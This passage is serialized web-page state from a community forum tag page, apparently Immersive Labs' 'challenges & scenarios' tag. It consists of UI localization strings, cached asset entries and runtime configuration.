{Newest Topics}}","newestOccasions":"Newest Events","mostRecent":"Most Recent","noReplies":"No Replies Yet","noSolutions":"No Solutions Yet","solutions":"Solutions","mostRecentUserContent":"Most Recent","trending":"Trending","draft":"Drafts","spam":"Spam","abuse":"Abuse","moderation":"Moderation","tags":"Tags","PAST":"Past","UPCOMING":"Upcoming","sortBymostRecent":"Sort By Most Recent","sortBymostRecentUserContent":"Sort By Most Recent","sortBymostKudoed":"Sort By Most Likes","sortBymostReplies":"Sort By Most Replies","sortBymostViewed":"Sort By Most Viewed","sortBynewest":"Sort By Newest Topics","sortBynewestOccasions":"Sort By Newest Events","otherTabs":" Messages list in the {tab} for {conversationStyle}","guides":"Guides","archives":"Archives"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageView/MessageViewInline-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageView/MessageViewInline-1751898025000","value":{"bylineAuthor":"{bylineAuthor}","bylineBoard":"{bylineBoard}","anonymous":"Anonymous","place":"Place {bylineBoard}","gotoParent":"Go to parent {name}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/common/OverflowNav-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/common/OverflowNav-1751898025000","value":{"toggleText":"More"},"localOverride":false},"CachedAsset:text:en_US-components/users/UserLink-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/users/UserLink-1751898025000","value":{"authorName":"View Profile: {author}","anonymous":"Anonymous"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageSubject-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageSubject-1751898025000","value":{"noSubject":"(no subject)"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageBody-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageBody-1751898025000","value":{"showMessageBody":"Show More","mentionsErrorTitle":"{mentionsType, select, board {Board} user {User} message {Message} other {}} No Longer Available","mentionsErrorMessage":"The {mentionsType} you are trying to view has been removed from the community.","videoProcessing":"Video is being processed. Please try again in a few minutes.","bannerTitle":"Video provider requires cookies to play the video. Accept to continue or {url} it directly on the provider's site.","buttonTitle":"Accept","urlText":"watch"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageTime-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageTime-1751898025000","value":{"postTime":"Published: {time}","lastPublishTime":"Last Update: {time}","conversation.lastPostingActivityTime":"Last posting activity time: {time}","conversation.lastPostTime":"Last post time: {time}","moderationData.rejectTime":"Rejected time: {time}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/nodes/NodeIcon-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/nodes/NodeIcon-1751898025000","value":{"contentType":"Content Type {style, select, FORUM {Forum} BLOG {Blog} TKB {Knowledge Base} IDEA {Ideas} OCCASION {Events} other {}} icon"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageUnreadCount-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageUnreadCount-1751898025000","value":{"unread":"{count} unread","comments":"{count, plural, one { unread comment} other{ unread comments}}"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageViewCount-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageViewCount-1751898025000","value":{"textTitle":"{count, plural,one {View} other{Views}}","views":"{count, plural, one{View} other{Views}}"},"localOverride":false},"CachedAsset:text:en_US-components/kudos/KudosCount-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/kudos/KudosCount-1751898025000","value":{"textTitle":"{count, plural,one {{messageType, select, IDEA{Vote} other{Like}}} other{{messageType, select, IDEA{Votes} other{Likes}}}}","likes":"{count, plural, one{like} other{likes}}"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageRepliesCount-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageRepliesCount-1751898025000","value":{"textTitle":"{count, plural,one {{conversationStyle, select, IDEA{Comment} OCCASION{Comment} other{Reply}}} other{{conversationStyle, select, IDEA{Comments} OCCASION{Comments} other{Replies}}}}","comments":"{count, plural, one{Comment} other{Comments}}"},"localOverride":false},"CachedAsset:text:en_US-shared/client/components/users/UserAvatar-1751898025000":{"__typename":"CachedAsset","id":"text:en_US-shared/client/components/users/UserAvatar-1751898025000","value":{"altText":"{login}'s avatar","altTextGeneric":"User's avatar"},"localOverride":false}}}},"page":"/tags/TagPage/TagPage","query":{"messages.widget.messagelistfornodebyrecentactivitywidget-tab-main-messages-list-for-tag-widget-0":"mostRecent","tagName":"challenges & scenarios"},"buildId":"3XH0qYWYCnEYycuN5W4S8","runtimeConfig":{"buildInformationVisible":false,"logLevelApp":"info","logLevelMetrics":"info","surveysEnabled":true,"openTelemetry":{"clientEnabled":false,"configName":"immersivelabs","serviceVersion":"25.4.0","universe":"prod","collector":"http://localhost:4318","logLevel":"error","routeChangeAllowedTime":"5000","headers":"","enableDiagnostic":"false","maxAttributeValueLength":"4095"},"apolloDevToolsEnabled":false,"quiltLazyLoadThreshold":"3"},"isFallback":false,"isExperimentalCompile":false,"dynamicIds":["components_customComponent_CustomComponent","components_community_Navbar_NavbarWidget","components_community_Breadcrumb_BreadcrumbWidget","components_tags_TagsHeaderWidget","components_messages_MessageListForNodeByRecentActivityWidget","components_community_FooterWidget","components_tags_TagSubscriptionAction","components_community_FooterWidgetHelpLink","components_community_KhorosLogo","components_customComponent_CustomComponentContent_TemplateContent","shared_client_components_common_List_ListGroup","components_messages_MessageView","components_messages_MessageView_MessageViewInline"],"appGip":true,"scriptLoader":[]}